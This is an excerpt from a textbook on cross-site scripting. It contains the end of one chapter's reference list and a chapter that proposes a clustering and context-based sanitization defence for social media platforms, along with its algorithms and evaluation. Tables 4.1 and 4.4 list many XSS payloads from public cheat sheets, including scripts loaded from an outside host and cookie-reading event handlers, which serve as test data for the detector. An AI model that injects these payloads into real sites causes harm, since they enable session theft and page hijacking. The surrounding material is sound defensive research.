(ICACCI). IEEE.
12. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
13. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
14. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
15. Gupta, S., & Gupta, B. B. (2017). Cross-site scripting (XSS)
attacks and defense mechanisms: Classifcation and state-of-the-
art. International Journal of System Assurance Engineering and
Management, 8(1), 512–530.
16. Gupta, S., & Gupta, B. B. (2018). A robust server-side javascript fea-
ture injection-based design for JSP web applications against XSS
vulnerabilities. In Cyber Security (pp. 459–465). Springer, Singapore.
17. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client‐server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
18. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). Hunting for DOM-
based XSS vulnerabilities in mobile cloud-based online social net-
work. Future Generation Computer Systems, 79, 319–336.
19. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of
visual similarity based approaches. Security and Communication
Networks, 2017.
20. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian, Z.
(2018). Deep learning based multi-channel intelligent attack detec-
tion for data security. IEEE Transactions on Sustainable Computing.
21. Khan, N., Abdullah, J., & Khan, A. S. (2015). Towards vulnerability
prevention model for web browser using interceptor approach. In
2015 9th International Conference on IT in Asia (CITA). IEEE.
22. Lalia, S., & Sarah, A. (2018, March). XSS attack detection approach
based on scripts features analysis. In World Conference on
Information Systems and Technologies (pp. 197–207). Springer,
Cham.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   73

23. Lekies, S., Stock, B., & Johns, M. (2013). 25 million fows later:
Large-scale detection of DOM-based XSS. In Proceedings of the
2013 ACM SIGSAC Conference on Computer & Communications
Security. ACM.
24. Mokbal, F. M. M., Dan, W., Imran, A., Jiuchuan, L., Akhtar, F.,
& Xiaoxi, W. (2019). MLPXSS: An integrated XSS-based attack
detection scheme in web applications using multilayer perceptron
technique. IEEE Access, 7, 100567–100580.
25. Moniruzzaman, M., Bagirov, A., Gondal, I., & Brown, S. (2018,
June). A server side solution for detecting WebInject: A machine
learning approach. In Pacifc-Asia Conference on Knowledge
Discovery and Data Mining (pp. 162–167). Springer, Cham.
26. Nadji, Y., Saxena, P., & Song, D. (2009, February). Document
structure integrity: A robust basis for cross-site scripting defense.
In NDSS.
27. Panja, B., Gennarelli, T., & Meharia, P. (2015). Handling cross site
scripting attacks using cache check to reduce webpage rendering
time with elimination of sanitization and fltering in light weight
mobile web browser. In 2015 First Conference on Mobile and Secure
Services (MOBISECSERV). IEEE.
28. Parameshwaran, E. B., Shinde, S., Dang, H., Sadhu, A., & Saxena, P.
(2015). DexterJS: Robust testing platform for DOM-based XSS vulner-
abilities. In Proceedings of the 2015 10th Joint Meeting on Foundations
of Sofware Engineering (ESEC/FSE 2015) (pp. 946–949). ACM.
29. Rocha, T. S., & Souto, E. (2014). ETSSDetector: A tool to automati-
cally detect cross-site scripting vulnerabilities. In 2014 IEEE 13th
International Symposium on Network Computing and Applications
(NCA). IEEE.
30. Ruse, M. E., & Basu, S. (2013). Detecting cross-site scripting vulner-
ability using concolic testing. In 2013 Tenth International Conference
on Information Technology: New Generations (ITNG). IEEE.
31. Scholte, T., Robertson, W., Balzarotti, D., & Kirda, E. (2012).
Preventing input validation vulnerabilities in web applications
through automated type analysis. In 2012 IEEE 36th Annual
Computer Sofware and Applications Conference (COMPSAC). IEEE.
32. Steinhauser, A., & Tůma, P. (2019). DjangoChecker: Applying
extended taint tracking and server side parsing for detection of
context‐sensitive XSS faws. Sofware: Practice and Experience,
49(1), 130–148.
74 ◾ Cross-Site Scripting Attacks

33. Stock, B., Pfstner, S., Kaiser, B., Lekies, S., & Johns, M. (2015). From
facepalm to brain bender: Exploring client-side cross-site scripting.
In Proceedings of the 22nd ACM SIGSAC Conference on Computer
and Communications Security (CCS '15) (pp. 1419–1430). ACM.
34. Tripathi, S., Gupta, B., Almomani, A., Mishra, A., & Veluru, S.
(2013). Hadoop based defense solution to handle distributed denial
of service (ddos) attacks. Journal of Information Security, 04(3), 150.
35. Van Acker, S., Nikiforakis, N., Desmet, L., Joosen, W., & Piessens,
F. (2012). FlashOver: Automated discovery of cross-site script-
ing vulnerabilities in rich internet applications. In Proceedings
of the 7th ACM Symposium on Information, Computer and
Communications Security) (pp. 12–13). ACM.
36. Vishnu, B. A., & Jevitha, K. P. (2014). Prediction of cross-site script-
ing attack using machine learning algorithms. In Proceedings of
the 2014 International Conference on Interdisciplinary Advances in
Applied Computing (ICONIAAC '14). ACM.
37. Wang, R., Jia, X., Li, Q., & Zhang, D. (2015). Improved N-gram
approach for cross-site scripting detection in Online Social
Network. In 2015 Science and Information Conference (SAI). IEEE.
38. Wang, R., Jia, X., Li, Q., & Zhang, S. (2014). Machine learn-
ing based cross-site scripting detection in online social network.
In 2014 IEEE International Conference on High Performance
Computing and Communications, 2014 IEEE 6th International
Symposium on Cyberspace Safety and Security, 2014 IEEE 11th
International Conference on Embedded Sofware and Syst (HPCC,
CSS, ICESS). IEEE.
39. Wang, R., Xu, G., Zeng, X., Li, X., & Feng, Z. (2018). TT-XSS: A
novel taint tracking based dynamic detection framework for DOM
cross-site scripting. Journal of Parallel and Distributed Computing,
118, 100–106.
40. Xiao, W., Sun, J., Chen, H., & Xu, X. (2014). Preventing client side
XSS with rewrite based dynamic information fow. In 2014 Sixth
International Symposium on Parallel Architectures, Algorithms and
Programing (PAAP). IEEE.
41. XSS incidents information. [online] Available at: http://www.
xssed.com/.
42. Zhang, Q., Chen, H., & Sun, J. (2010). An execution-fow based
method for detecting cross-site scripting attacks. In 2010 2nd
International Conference on Sofware Engineering and Data
Mining (SEDM). IEEE.
CHAPTER 4

Clustering and
Context-Based
Sanitization
Mechanism for
Defending against
XSS Attack

T he XSS attack is the only web application vulnerability


that has been identifed during static testing as well as dur-
ing dynamic testing of the web applications. Tis provides an
estimate of how prevalent and dangerous this attack would be.
Terefore, in this chapter, we have proposed an approach that
assists in defending against the XSS attack. Basically, it is based
on a context-based sanitization method on malicious scripts. We

75
76 ◾ Cross-Site Scripting Attacks

have optimized the performance by implementing clustering on


the scripts. Let’s discuss this approach in detail.

4.1 INTRODUCTION
When we think about the internet, it means a market for several
web applications that may correspond to diferent sectors or busi-
nesses such as e-commerce, manufacturing, telecom, education,
and so many [10, 12]. However, the most dominant and popular
web application is the social network. Social media has taken the
usage of the internet to another level. Now, everyone is connected
to their loved ones either personally or professionally via a single
network. But not every person is good; it attracts evil persons
like fraudsters, attackers, and online predators. Social media has
become a platform to host several vulnerabilities and attacks [24,
30]. XSS attack is a highly exploited vulnerability that helps in
triggering other dangerous attacks like DoS. Terefore, research-
ers have developed techniques for mitigating XSS [5, 6, 11, 13, 19].
Input validation and sanitization are considered to be the frst
and foremost defensive measures for mitigating the efects of XSS
worms from the platforms of web applications [5]. Nevertheless,
these techniques incur high-performance overhead. Terefore,
this chapter presents an approach based on clustering and con-
text-based sanitization to thwart XSS attack on social media. Tis
approach utilizes some basic mechanisms to achieve its function-
alities. Hence, in the following subsections, we will discuss the
preliminaries required to understand the working of proposed
approach.

4.1.1 Views
Views can be understood as the working interface for the current
user of the web application for the requested action. Actually, it is
a sandboxed thread that implements a portion of the web applica-
tion. At the browser end, it will appear as the web page or a part of
it. It is used to secure the other ongoing processes on the system.
Sanitization Mechanisms for Defending against XSS Attack    ◾   77

For instance, on social media, commenting on posts may be con-


sidered as a diferent view from the remaining web page. It helps
us in processing the user request in isolation from other parts of
the web application. Hence, the view will aid in enhancing the
security aspect of the web application.

4.1.2 Access Control List (ACL)


ACL is a list prepared to control access to the information within
a system. It is prepared according to the privileges granted to
the user of the system. In a nutshell, it basically performs action
authentication; i.e. it checks whether the user is authorized to per-
form the requested action or not. Actions are considered to be
the tasks executed by the view. For example, an action may be
originated from a view, say, “V” to post a comment on V’s com-
ment area. Precisely, we can assign actions as the privileges given
to a view to act accordingly. ACL contains the entry in the form of
<User ID, privileges> as shown below, User ID denotes the user’s
cookie information, and privileges denote the actions performed
by the user corresponding to that User ID. Finally, ACL is main-
tained and controlled at the client side for the authentication of
each action.

User ID Privileges
<1> Read, Write, Update

4.1.3 Context-Based Sanitization


Sanitization is a method to validate the untrusted user input as
per the format specifed by the web application. Multiple saniti-
zation techniques have been proposed in literature, but very few
have focused toward sanitization as per the context of the injected
script. Context-sensitive sanitization applies sanitizer on each
untrusted variable (i.e dynamic content like JavaScript) according
to the context in which it is used. Tere may be diferent contexts
present in an HTML document like element tag, attribute value,
78 ◾ Cross-Site Scripting Attacks

style sheet, script, anchors, href, etc. Tese contexts may be used
by the attacker to launch XSS attack.

4.2 PROPOSED APPROACH


In this section, we discuss our approach in detail. Tis approach
not only detects complete script injection but also detects partial
script injection. Let’s have a look at the abstract design model of
this approach.

4.2.1 Abstract Design


Te proposed approach is a view-separation and clustering-based
context-sensitive sanitization technique. In addition, it is a client-
server technique that aims to provide protection to each view of
the web application from XSS attack. Tis is done through the
identifcation of partial JavaScript injection (i.e. modifcation
of existing script to inject malicious parameters) along with
the entire JavaScript matching. Tis method protects from the
attacker gaining access to any view. Moreover, the attacker can-
not steal the sensitive information related to that view like session
token, cookie information, or any other personal information of
the user who is authenticated for that view.
It constitutes two phases: training phase and recognition
phase. In the former phase, the web application is partitioned
into all possible views and ACL is rehearsed to apprentice all the
privileges/rights a particular view can secure. Te later phase
initially identifes all the injection points in the generated view
corresponding to each extracted HTTP request at the server side.
Secondly, at the client side, the recognition phase performs an
action authentication to certify that the corresponding view pos-
sesses the capability to perform that action or not. If an action
is authenticated, then the request is granted and it discovers the
malicious XSS attack worm at each extracted injection point of
the web application. It then executes comparative string match-
ing algorithm for identifying partial script injection together with
Sanitization Mechanisms for Defending against XSS Attack    ◾   79

clustering to generate compressed template on the XSS attack.


Finally, clustered templates are sanitized by applying sanitizer
routine with matching context and the result is displayed to the
online user. Otherwise, the request is denied. Figure 4.1 illustrates
the abstract view of our proposed approach.
Table 4.1 highlights some of the HTML features used to inject
the XSS vector into the web application.

4.2.2 Detailed Design


Tis section provides the comprehensive overview of the proposed
approach. It shows how diferent modules interact with each other.
Figure 4.2 depicts the micro view of the abstract design with all
the inner modules [5].

FIGURE 4.1 Abstract design view of the proposed approach.


80 ◾ Cross-Site Scripting Attacks

TABLE 4.1 Suspicious HTML Elements


Type Context Code Sample
String HTML Body <span>alert(“document.cookie”);</span>
String Safe HTML <input type="text" name="fname" src="
Attributes attack_malicious URL ">
String GET Parameter <a href="/site/search?value=" http://ha.ckers.org/
xss.js”>clickme</a>
String Untrusted URL <a href=" http://ha.ckers.org/xss.js ">clickme</
in a SRC or a><iframe src=" javascript:alert('XSS');" />
HREF attribute
String CSS Value <div>Selection</div>
String JavaScript <script>var currentValue= document.write(
Variable "<SCRI");</script><script>someFunction
('http://ha.ckers.org/xss.js"');</script>
HTML HTML Body <div>>@import'http://ha.ckers.org/xss.css';</div>
String DOM XSS <script>document.write(“22%2b%22cript%20
src=http://my.box.com/xss.js%3E%3C/scrip
t%3E%22)<script/>

Tis approach comprises of two phases: training phase and recog-


nition phase. Let’s have a look into the working of each of these phases.

4.2.2.1 Training Phase


In this phase, all possible views of the web application are gen-
erated to prepare ACL that contains all actions that a particular
view can implement. In this phase, we will learn about all actions/
privileges that a view can perform by sending HTTP request. ACL
provides the information as to which view can originate what
kind of actions. Tis phase must be done carefully, as the action
authentication efciency depends on this phase. If ACL includes
all actions for which a view is capable of, then, in the recognition
phase, the action authentication operation can be accomplished
efciently.

4.2.2.2 Recognition Phase


It is the most important phase as XSS attack detection is achieved
here by utilizing the capabilities of ACL list prepared during the
Sanitization Mechanisms for Defending against XSS Attack    ◾   81

FIGURE 4.2 Detailed design view of the proposed approach.

training phase followed by the clustering-based context-sensitive


sanitization process. It performs the following steps:

• When the server receives the request from the user, it is for-
warded to the session manager. Here, it is mapped to the
stored session corresponding to the user’s cookie informa-
tion (i.e. user’s login credentials).
• Te request is processed to check whether it alters the server
content or not. For example, a request to post a comment. If
it does not modify the content, then the server generates the
static web page and returns it to the browser.
82 ◾ Cross-Site Scripting Attacks

• Otherwise, the web application splits into multiple views. Te


URL mapper handles the mapping of the URL to its corre-
sponding view. And as a result, it is capable of forwarding the
request to the particular view to process the request.
• Depending upon the request, the corresponding view is
extracted via view handler and returned to the browser as
the response.

Te above four steps are executed at the server side. Te steps to be


implemented at the client side are illustrated as below:

• When the browser retrieves the response, frstly, it is parsed by


the HTML parser and Lexer. Te parsed document is processed
by the document generator to render the web content. Finally,
it is processed by the action authenticator to check whether the
action can be completed or not with the help of ACL list. If the
action is not authenticated, then it means the attacker is trying to
breach the view privileges and is trying to launch the XSS attack.
Terefore, the action cannot be completed; i.e. access is denied.
• It discovers the malicious XSS attack vectors present at all
the hidden injection points. It applies a comparative string
matching algorithm on the extracted attack vectors to iden-
tify the partial script injection by utilizing the XSS attack
vector repository.
• Clustering is applied on the malicious scripts to produce
compressed templates. Finally, it sanitizes these clustered
templates by applying the sanitization primitives depending
on the matching context. Afer the successful sanitization of
each template, these are injected into the document and the
fnal HTML document is displayed to the user.

Figure 4.3 presents the working fow chart of the proposed approach.
Sanitization Mechanisms for Defending against XSS Attack    ◾   83

FIGURE 4.3 Flow chart of the proposed approach.


84 ◾ Cross-Site Scripting Attacks

4.2.3 Key Modules


In this section, we discuss the key modules involved in the work-
ing of the proposed approach. Te modules are:

• Session Supervisor: It is used to store the session corre-


sponding to the user login credentials for the mapping of
the user cookie to their stored sessions. It is responsible for
controlling and monitoring the stored sessions. Basically, it
stores and maps the information given to the server at the
time of registration/login. It keeps track of all the activities
accomplished by the user during the time period of a par-
ticular session. Terefore, it can be utilized to monitor all
the activities of a particular user.
• URL Synchronizer: It performs synchronization of the
requested URL to the view that is responsible for processing
the request. It is also responsible for the generation of the
views on the basis of requested URL.
• View Manager: It is responsible for the extraction of the
requested view and returns it to the browser as the response.
It also extracts the view corresponding to each extracted
request.
• Injection Point Identifer: Tis component is responsible
for the identifcation of injection points in the response web
page where an attacker may inject malicious code to launch
XSS attack. Tis is achieved by monitoring all the malicious
contexts in the document with the help of HTML malicious
context directory.
• HTML Parser: Tis component acts at the client side and is
the frst module that receives the HTML document generated
as the response by the server. Its key goal is to construct a
parse tree, i.e. Document Object Model (DOM). It is a method
by which the browser interprets the document and displays it
Sanitization Mechanisms for Defending against XSS Attack    ◾   85

to the user. During the parsing phase, the executable script


nodes are determined and the nodes are created for them
in the parse tree. In addition to this, the data nodes are also
created in this component. Finally, this tree is passed to the
document generator and the HTML parsing is complete.
• HTML Content Separator: It stores and processes the web
content represented by the parse tree. It basically performs
the separation of the content and gives it to the other parts of
the browser for rendering. For example, the scripting code is
supplied to the JavaScript parser for processing.
• Action Authenticator: It checks the authenticity of the action.
It is responsible for determining whether the view is capable
of performing the action or not, i.e. whether it has the capa-
bility to execute action or not. Action authentication is done
with the help of the ACL prepared at the time of training
phase. To check the action authenticity, the action authenti-
cator uses the User ID to fnd the corresponding entry in the
ACL. If the User ID matches with an entry in the ACL, then
it checks the privileges attached to it and checks for the origi-
nated action. If that matches the privileges, then the action
is authenticated. Otherwise, it means that some adversary is
trying to breach the security of the view by injecting some
XSS attack vector into the view.
• Script Extractor: It is responsible for the detection of mali-
cious XSS attack payloads present at the identifed injec-
tion points. It retrieves all attack vectors corresponding to
the diferent contexts as shown in Table 4.2 [29]. Extracted
attack vectors (say AV) are matched with the stored mali-
cious scripts (AS) in XSS attack vector repository. Tis is
achieved with the help of comparative string matching
algorithm. If AV is larger than AS, then the stored script is
examined in an extracted attack vector to detect the entire
86 ◾ Cross-Site Scripting Attacks

TABLE 4.2 List of HTML


Elements and Teir Contexts
Elements Context
HTML PCDATA
RCDATA
Tag Name
ATTRIBNAME
HTMLATTRIB Quoted
Unquoted
JavaScript String
REGEX
Cascading Style ID
Sheet (CSS) Class
PROPNAME
KEYWDVAL
QUANT
String
Quoted URL
Unquoted URL
URL Start
Query
General

script injection. On the other hand, if AS is larger than AV,


then the extracted attack vector is searched within the stored
scripts to discover partial script injection.
• Clustered Scripts Template Generator: Tis component
implements an algorithm (as shown in Figure 4.4) for clus-
tering the extracted attack vectors payloads depending on
their similarity ratio. Consequently, a clustered template
is generated that describes the attack vectors in the com-
pressed form by using distance-based clustering algorithm
[3]. Consider the example as shown below:

<script>alert(48a$bc);</script>
Sanitization Mechanisms for Defending against XSS Attack    ◾   87

Algorithm: Template generator

Input: Malicious Attack Vector Payloads

Output: Clustered Template of Attack Vector


Payloads

Threshold ( a ):= 0;

Start

TAV_ Rep ¬ list of traversed attack vectors;

C_Rep ¬ NULL;

VX ¬ 0

For Each attack vector AX Î TAV_ Rep

Compare(AX , AX+1);

VX ¬ Levenshtein_distance(AX, AX+1);

If (VX > a )

Accept (AX , AX+1);

Generate template T Î (AX ,


AX+1);

C_Rep ¬ T È C_Rep;

End If

Else

Discard (AX , AX+1);

Select other pair (AX+1, AX+2);

End Else

End For Each

Return C_Rep

End

FIGURE 4.4 Algorithm for clustered template generation.


88 ◾ Cross-Site Scripting Attacks

<script>alert(48xv&ez);</script>

Tese scripts only difer by their argument value. In this view,


a compressed template is generated by applying the proposed
algorithm as shown in Figure 4.6. A template is a string pro-
duced by several types of lexical tokens that are considered to
be common for each attack vector payload in a cluster, along
with the variable portion, represented by the placeholders.
Similarity matrix is calculated by using the algorithm dis-
cussed in [22]. N- used as a substitute for numbers and S- used
as a substitute for alphanumeric characters. Tus, the template
for the above set of scripts is denoted as:

<script>alert(48-S-);</script>

Te input to the algorithm is the TAV_Rep that contains the


list of the extracted attack vector. In all iterations, it compares
a pair of attack vectors A X and A X+1 and then uses Levenshtein
distance (VX) to generate the templates. It is defned as the
minimum amount of single character deletion, insertion, or
substitution required to convert one form of string to another.
If VX is less than a selected threshold (α), then extract the
similar character between the pair of attack vectors A X and
A X+1. Non-similar characters are replaced by the placeholders
(N/S). Otherwise, the pair is discarded and it selects another
pair for comparison. Te fnal output is the clustered template
as shown in the above example. Te generated template T is
stored in the C_Rep for further processing.
• Context-Based Sanitizer: Sanitization is a process for
substituting the untrusted user variable with the sani-
tized variable. Te clustered scripts templates are sanitized
according to the context in which they are used in the HTML
Sanitization Mechanisms for Defending against XSS Attack    ◾   89

document. In addition, the same clustering algorithm is


applied on the sanitized templates of the malicious XSS
attack vectors. Figure 4.5 describes the proposed algorithm
used by the context-sensitive sanitization engine to sanitize
the templates. Tis algorithm works as follows: log SR_log is
maintained, which includes the sanitizer vector used for the
sanitization. Te VU is an array used to hold the untrusted
variables. Te VS denotes an array used to hold the sanitized
variable. C_Rep stores the list of the clustered templates and
SCLU_Rep is used to store the sanitized clustered template.
For every template, TI is retrieved from C_Rep; the algo-
rithm searches for the untrusted variable and stores it in the
VU to determine the context (CI) and then applies the sani-
tizer (SI) according to the context in which the VU is used.
Te sanitized variable is stored in VS and then it is appended
to the SR_log for more efective result. Afer sanitization of
each template in C_Rep, we apply clustering algorithm as
shown in Figure 4.4 to the sanitized template array SR_log
and store the sanitized clustered template in SCLU_Rep. All
the sanitized variables are then injected to the HTML docu-
ment at their respective locations and the modifed HTML
document is displayed to the user.

4.3 EXPERIMENTAL TESTING AND


EVALUATION RESULTS
In this section, we discuss the implementation details of our pro-
posed approach to thwart XSS attack on the social networking
platform. We will also analyze the performance of our approach
by testing it on fve real-world social media platforms including
Elgg [8], Humhub [17], WordPress [28], Drupal [7], and Joomla
[18]. Additionally, we will compare our proposed approach with
the existing state-of-the-art techniques on the basis of some per-
formance evaluation parameters.
90 ◾ Cross-Site Scripting Attacks

Algorithm: Context-Sensitive Sanitization engine

Input: Set of clustered script templates (T1, T2, T3… TN).

Output: Sanitized attack vectors templates

Start

SR_log Ü List of externally available sanitizers routines (S1,


S2, … SN)

C_Rep Ü Set of clustered scripts templates;

SCLU_Rep Ü NULL;

VU Ü f ;

VS Ü f;

For Each template TI Î C_Rep

Remove placeholders (N/S) Î TI ;

VU Ü untrusted-variable(TI);

CI Ü Context(VU);

SI Ü (S Î SR_log) Ç (S matches CI);

VS Ü SI (TI);

SR_log Ü VS È SR_log;

End For Each

For Each SI Î SR_log

SCLU_Rep Ü Template-generator(SI);

End For Each

Return SCLU_Rep;

End

FIGURE 4.5 Algorithm of context-sensitive sanitization.


FIGURE 4.6 Detection rate of the proposed approach on diferent testing platforms.
Sanitization Mechanisms for Defending against XSS Attack    ◾   91
92 ◾ Cross-Site Scripting Attacks

4.3.1 Implementation Details


We implemented this approach in Java using NetBeans IDE. We
used single desktop system comprising of 1.6 GHz AMD proces-
sor, 8 GB DDR RAM, and Windows 7 operating system. We used
XAMPP as the server to make the single system behave as the cli-
ent as well as the server. MySQL database is used at the backend.
We utilized jsoup [20] HTML parser to parse the HTTP
response web page, frstly, received at the client side. We used
distance-based clustering algorithm [3] in which text similarity
is computed by algorithm used in [22]. Sanitization of clustered
attack vectors template is done using ESAPI [9] sanitization func-
tion. We tested the detection efciency on fve diferent platforms
as shown in Table 4.3. In the context of accuracy, we calculated
the percentage of XSS attack vector payload that has been detected
and nullifed. But, when talking about performance of approach,
we evaluated the issues while executing our approach on the dif-
ferent platforms, loading diferent web pages, and dealing with a
variety of context standards in HTML. Information related to the
testing dataset is provided in the following section.

4.3.2 Categories of XSS Attack Vectors


We collected the XSS attack vector cheat sheet from fve diferent
repositories [1, 2, 9, 14, 15, 27]. Te collected dataset contained the
old as well as the new attack vectors and is of diferent contexts.
Table 4.4 shows diferent categories of the malicious XSS attack

TABLE 4.3 Testing Platforms


Application Version Source language
Elgg 1.8.16 PHP
WordPress 3.6.1 PHP
Humhub 0.10.0 PHP and jquery
Joomla 3.2.0 PHP
Drupal 7.23 PHP
Sanitization Mechanisms for Defending against XSS Attack    ◾   93

TABLE 4.4 Categories of XSS Attack Vectors


Context Malicious Attack Vector Payload
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”background- image:\0075\0072\006C\0028’\006a\0061\0076\
0061\0073\0063\0072\0069\0070\0074\003a\0061\0
06c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029”>
<DIV STYLE=”background-image: url(&#1;javascript:alert(‘XSS’))”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html
"></OBJECT>
HTML MALICIOUS TAG

<BODY> <?xml:namespace prefx="t" ns="urn:schemas-microsof-


com:time"> <?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>"> </BODY>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;
&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
(Continued )
94 ◾ Cross-Site Scripting Attacks

TABLE 4.4 (CONTINUED) Categories of XSS Attack Vectors


Context Malicious Attack Vector Payload
<IMG LOWSRC="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
JAVASCRIPT ATTACK VECTORS

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >


<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers
.org/xss.js"></SCRIPT>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><
LI>XSS</br>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
CASCADING STYLE SHEET

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
(CSS) ATTACK VECTORS

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</S
TYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><
LI>XSS</br>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
(Continued )
Sanitization Mechanisms for Defending against XSS Attack    ◾   95

TABLE 4.4 (CONTINUED) Categories of XSS Attack Vectors


Context Malicious Attack Vector Payload
<a onmouseover="alert(document.cookie)">xxs link</a>
<A HREF="//google">XSS</A>
URL ATTACK VECTORS

<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">
XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<img src=asdf onerror=alert(document.cookie)>
HTML MALICIOUS EVENT

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22crip
t%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
HANDLER

<video onerror="alert(1)"><source></source></video>
<IMG SRC= onmouseover="alert('xss')">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC=# onmouseover="alert('xxs')">

vector payload, including HTML malicious tags, JavaScript attack


vectors, CSS attack vectors, URL attack vectors, and HTML mali-
cious event handler. Tese attack vectors also include the HTML5
attack vectors. Tis was done for evaluating the XSS attack vec-
tor mitigation capability of approach on open source social media
web applications.

4.3.3 Detection Outcome


Initially, we observed the results using a total of 127 XSS attack vec-
tor on fve testing platforms. Te experimental results are shown
in Table 4.5. Te ease with which we are integrating our proposed
approach on the testing platforms is showing its fexible compat-
ibility. It is clearly refected from the Table 4.6 that very few false
positives and false negatives are observed in all fve testing plat-
forms. We also calculated the XSS attack payload detection rate
96 ◾ Cross-Site Scripting Attacks

